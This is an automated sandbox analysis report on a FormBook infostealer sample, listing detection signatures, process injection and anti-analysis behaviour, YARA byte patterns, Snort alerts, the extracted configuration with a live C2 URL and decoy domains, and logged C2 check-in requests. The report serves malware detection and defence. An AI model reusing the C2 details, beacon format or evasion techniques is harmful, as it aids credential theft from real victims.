Loading ...

Play interactive tourEdit tour

Analysis Report INv02938727.exe

Overview

General Information

Sample Name:INv02938727.exe
Analysis ID:411836
MD5:a3b74acf9723e53d6caea736faae9708
SHA1:2714e0ec97d81921312f0db6470dc40f55d16b96
SHA256:f8e8f64bb17ffb2fea18b7671602a76a8b5734607c7a7ae035dce8eed8381a74
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • INv02938727.exe (PID: 4852 cmdline: 'C:\Users\user\Desktop\INv02938727.exe' MD5: A3B74ACF9723E53D6CAEA736FAAE9708)
    • INv02938727.exe (PID: 3632 cmdline: C:\Users\user\Desktop\INv02938727.exe MD5: A3B74ACF9723E53D6CAEA736FAAE9708)
      • explorer.exe (PID: 3292 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autochk.exe (PID: 6960 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 34236DB574405291498BCD13D20C42EB)
      • control.exe (PID: 7072 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
        • cmd.exe (PID: 7088 cmdline: /c del 'C:\Users\user\Desktop\INv02938727.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.hometowncashbuyersgroup.com/kkt/"], "decoy": ["inspirafutebol.com", "customgiftshouston.com", "mycreativelending.com", "psplaystore.com", "newlivingsolutionshop.com", "dechefamsterdam.com", "servicingl0ans.com", "atsdholdings.com", "manifestarz.com", "sequenceanalytica.com", "gethealthcaresmart.com", "theartofsurprises.com", "pirateequitypatrick.com", "alliance-ce.com", "wingrushusa.com", "funtimespheres.com", "solevux.com", "antimasathya.com", "profitexcavator.com", "lankeboxshop.com", "aarthiramamurthy.com", "oldmopaiv.xyz", "mavispaguzellik.com", "milkamax.com", "sputnikvasisi.com", "gametoyou.com", "sisconbol.com", "thedreamcertificate.com", "vichy-menuiserie.com", "pv-step.com", "growingmindstrilingual.com", "tlcrentny.com", "jedshomebuilders.com", "curtailit.com", "integruschamber.com", "lanzamientosbimbocolombia.com", "tightlinesfishingco.com", "doubleuphome.com", "arctic.solar", "unstopabbledomains.com", "aggiornamento-isp.info", "clarkandhurnlaw.com", "barefootbirthstl.com", "seanfeuct.com", "measureformeasurehome.com", "stephsavy.com", "loveflowersandevents.com", "czsis.com", "midnightblueinc.com", "today.dental", "customwithme.com", "edisetiyo.com", "jasoneganrealtor.com", "rihxertiza.com", "seahorseblast.net", "nedayerasa.com", "cliftonheightshoa.net", "theprofilemba.com", "cfwoods.com", "dogggo.com", "casatranquillainletbeach.com", "u1023.com", "aromakapseln.com", "zhwanjie.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.511352331.0000000003250000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000F.00000002.511352331.0000000003250000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000F.00000002.511352331.0000000003250000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
      00000002.00000002.315850834.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        Click to see the 18 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.INv02938727.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.INv02938727.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          2.2.INv02938727.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17609:$sqlite3step: 68 34 1C 7B E1
          • 0x1771c:$sqlite3step: 68 34 1C 7B E1
          • 0x17638:$sqlite3text: 68 38 2A 90 C5
          • 0x1775d:$sqlite3text: 68 38 2A 90 C5
          • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
          2.2.INv02938727.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            2.2.INv02938727.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            Click to see the 1 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 0000000F.00000002.511352331.0000000003250000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.hometowncashbuyersgroup.com/kkt/"], "decoy": ["inspirafutebol.com", "customgiftshouston.com", "mycreativelending.com", "psplaystore.com", "newlivingsolutionshop.com", "dechefamsterdam.com", "servicingl0ans.com", "atsdholdings.com", "manifestarz.com", "sequenceanalytica.com", "gethealthcaresmart.com", "theartofsurprises.com", "pirateequitypatrick.com", "alliance-ce.com", "wingrushusa.com", "funtimespheres.com", "solevux.com", "antimasathya.com", "profitexcavator.com", "lankeboxshop.com", "aarthiramamurthy.com", "oldmopaiv.xyz", "mavispaguzellik.com", "milkamax.com", "sputnikvasisi.com", "gametoyou.com", "sisconbol.com", "thedreamcertificate.com", "vichy-menuiserie.com", "pv-step.com", "growingmindstrilingual.com", "tlcrentny.com", "jedshomebuilders.com", "curtailit.com", "integruschamber.com", "lanzamientosbimbocolombia.com", "tightlinesfishingco.com", "doubleuphome.com", "arctic.solar", "unstopabbledomains.com", "aggiornamento-isp.info", "clarkandhurnlaw.com", "barefootbirthstl.com", "seanfeuct.com", "measureformeasurehome.com", "stephsavy.com", "loveflowersandevents.com", "czsis.com", "midnightblueinc.com", "today.dental", "customwithme.com", "edisetiyo.com", "jasoneganrealtor.com", "rihxertiza.com", "seahorseblast.net", "nedayerasa.com", "cliftonheightshoa.net", "theprofilemba.com", "cfwoods.com", "dogggo.com", "casatranquillainletbeach.com", "u1023.com", "aromakapseln.com", "zhwanjie.com"]}
            Multi AV Scanner detection for submitted fileShow sources
            Source: INv02938727.exeVirustotal: Detection: 61%Perma Link
            Source: INv02938727.exeMetadefender: Detection: 35%Perma Link
            Source: INv02938727.exeReversingLabs: Detection: 68%
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 0000000F.00000002.511352331.0000000003250000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.315850834.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.319119238.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.318875826.0000000001590000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.509884177.0000000002E10000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.250754758.00000000036D9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.512153616.0000000004B30000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 2.2.INv02938727.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.INv02938727.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Machine Learning detection for sampleShow sources
            Source: INv02938727.exeJoe Sandbox ML: detected
            Source: 2.2.INv02938727.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: INv02938727.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: INv02938727.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: wntdll.pdbUGP source: INv02938727.exe, 00000002.00000002.318304038.000000000134F000.00000040.00000001.sdmp, control.exe, 0000000F.00000002.512781049.0000000004E8F000.00000040.00000001.sdmp
            Source: Binary string: control.pdb source: INv02938727.exe, 00000002.00000002.319494012.0000000003390000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: INv02938727.exe, control.exe
            Source: Binary string: control.pdbUGP source: INv02938727.exe, 00000002.00000002.319494012.0000000003390000.00000040.00000001.sdmp
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 4x nop then pop esi
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 4x nop then pop ebx
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 4x nop then pop edi
            Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop esi
            Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop ebx
            Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop edi

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49723 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49723 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49723 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49733 -> 184.168.131.241:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49733 -> 184.168.131.241:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49733 -> 184.168.131.241:80
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: www.hometowncashbuyersgroup.com/kkt/
            Source: global trafficHTTP traffic detected: GET /kkt/?n8=WT801LO0&ItLd=YJq3LfF57r8Qfq7uTCgZxOPP1vMH1/e9D5ir0WlXFDknegtt717KVO1lFmJGJc9BoYXzy139hQ== HTTP/1.1Host: www.manifestarz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /kkt/?ItLd=mESCp8fUWMf2GiNccZQr41WoLlunmDO2dTTww9D/7e3BTia5ZniOyGA6Z4qikYh0oIJWnb//TQ==&n8=WT801LO0 HTTP/1.1Host: www.funtimespheres.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /kkt/?n8=WT801LO0&ItLd=beAPPUpQq3bTf0wVpdVGLtZQUj/Y58U/IZEW6sslvUZTyjBteEnfLFfdWI9VdBzisWFD4iTcDg== HTTP/1.1Host: www.sequenceanalytica.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 184.168.131.241 184.168.131.241
            Source: Joe Sandbox ViewASN Name: EGIHOSTINGUS EGIHOSTINGUS
            Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
            Source: global trafficHTTP traffic detected: GET /kkt/?n8=WT801LO0&ItLd=YJq3LfF57r8Qfq7uTCgZxOPP1vMH1/e9D5ir0WlXFDknegtt717KVO1lFmJGJc9BoYXzy139hQ== HTTP/1.1Host: www.manifestarz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /kkt/?ItLd=mESCp8fUWMf2GiNccZQr41WoLlunmDO2dTTww9D/7e3BTia5ZniOyGA6Z4qikYh0oIJWnb//TQ==&n8=WT801LO0 HTTP/1.1Host: www.funtimespheres.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /kkt/?n8=WT801LO0&ItLd=beAPPUpQq3bTf0wVpdVGLtZQUj/Y58U/IZEW6sslvUZTyjBteEnfLFfdWI9VdBzisWFD4iTcDg== HTTP/1.1Host: www.sequenceanalytica.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: unknownDNS traffic detected: queries for: www.manifestarz.com
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 12 May 2021 13:33:02 GMTContent-Type: text/htmlContent-Length: 355Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 d2 b3 c3 e6 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 20 75 72 6c 3d 2f 22 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><title>404</title></head><body><meta http-equiv="refresh" content="0; url=/"></body></html>
            Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: control.exe, 0000000F.00000002.515402628.000000000578F000.00000004.00000001.sdmpString found in binary or memory: http://mindcart.ai/kkt/?n8=WT801LO0&ItLd=beAPPUpQq3bTf0wVpdVGLtZQUj/Y58U/IZEW6sslvUZTyjBteEnfLFfdWI9
            Source: INv02938727.exe, 00000001.00000002.250096553.00000000026D1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: explorer.exe, 00000003.00000000.269026840.0000000006870000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
            Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: explorer.exe, 00000003.00000000.279894776.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: INv02938727.exe, 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
            Source: INv02938727.exe, 00000001.00000002.249298987.0000000000829000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 0000000F.00000002.511352331.0000000003250000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.315850834.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.319119238.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.318875826.0000000001590000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.509884177.0000000002E10000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.250754758.00000000036D9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.512153616.0000000004B30000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 2.2.INv02938727.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.INv02938727.exe.400000.0.raw.unpack, type: UNPACKEDPE

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 0000000F.00000002.511352331.0000000003250000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000F.00000002.511352331.0000000003250000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000002.00000002.315850834.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000002.00000002.315850834.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000002.00000002.319119238.0000000002F00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000002.00000002.319119238.0000000002F00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000002.00000002.318875826.0000000001590000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000002.00000002.318875826.0000000001590000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000F.00000002.509884177.0000000002E10000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000F.00000002.509884177.0000000002E10000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000001.00000002.250754758.00000000036D9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000001.00000002.250754758.00000000036D9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000F.00000002.512153616.0000000004B30000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000F.00000002.512153616.0000000004B30000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 2.2.INv02938727.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 2.2.INv02938727.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 2.2.INv02938727.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 2.2.INv02938727.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_00419D60 NtCreateFile,
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_00419E10 NtReadFile,
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_00419E90 NtClose,
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_00419F40 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_00419D5A NtCreateFile,
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_00419E0A NtReadFile,
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01299910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012999A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01299860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01299840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012998F0 NtReadVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01299A20 NtResumeThread,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01299A00 NtProtectVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01299A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01299540 NtReadFile,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012995D0 NtClose,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01299710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012997A0 NtUnmapViewOfSection,LdrInitializeThunk,
